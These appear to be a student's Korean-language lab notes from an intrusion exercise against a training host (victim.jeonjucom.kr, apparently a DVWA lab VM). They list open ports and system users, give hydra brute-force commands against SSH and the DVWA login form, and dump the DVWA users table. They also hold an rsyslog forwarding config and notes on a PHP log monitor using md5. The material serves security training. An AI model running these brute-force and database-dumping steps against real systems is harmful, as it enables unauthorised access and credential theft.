1. victim.jeonjucom.kr 를 공격하시오
정보수집 후 사이트에 접속하시오

victim.jeonjucom.kr 의 IP는 무엇인가?
192.168.0.126
열려있는 포트는 무엇인가
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
3306/tcp open  mysql
5040/tcp open  unknown
5357/tcp open  wsdapi
8080/tcp open  http-proxy

admin password
서버에 등록된 사용자는 몇명인가?
bee
neo
alice
thor
wolverin
johnny
selene
7명
시스템에 접속할 수 있는가?

2. 윈도우 10에서 3대서버로 접속할수 있도록 설정후 
웹 브라우저와 Editplus로 접속하시오

hydra -L user.txt -P passwd.txt 192.168.0.126 ssh
hydra -L user.txt -P passwd.txt victim.jeonjucom.kr http-post-form "/dvwa/login.php:id=^USER^&pw=^PASS^:fail" -V

3. syslogd를 사용한 로그 기록 syslogd는 시스템 로그를 기록하는 프로그램 
/var/log/syslog
syslog > rsyslog로 대체됨

3 192.168.0.126 222

dvwa 로그인
/var/www/config/config파일 확인
mysql -u root -p
bug

show databases;
use dvwa
show tables;
desc users;
select * from users;

mysqldump -u root -p dvwa > dvwa.sql 백업하기
mysql -u st -p st < dvwa.sql 복구
mysql -u st -p
show databases;
use st
show tables;
select * from users;

/etc/rsyslog.d/50~ 파일에 액션 추가
126 데이터베이스로 연결하기
action(type="omfwd"
       queue.filename="IP211.st.kr"
       queue.maxdiskspace="1g"
       queue.saveonshutdown="on"
       queue.type="LinkedList"
       action.resumeRetryCount="-1"
       Target="192.168.0.126" Port="514" Protocol="tcp")

-> 126 데이터베이스에 누적

php 버젼 체크
php -v

MySQL Examples in Both MySQLi and PDO Syntax
In this, and in the following chapters we demonstrate three ways of working with PHP and MySQL:
MySQLi (object-oriented)
MySQLi (procedural)
PDO

로그 모니터링 시스템 개발
php 버전 : 8.3.11
변수 : $password, $user
함수 : md5()
전송방식 : POST
데이터베이스 : Mysql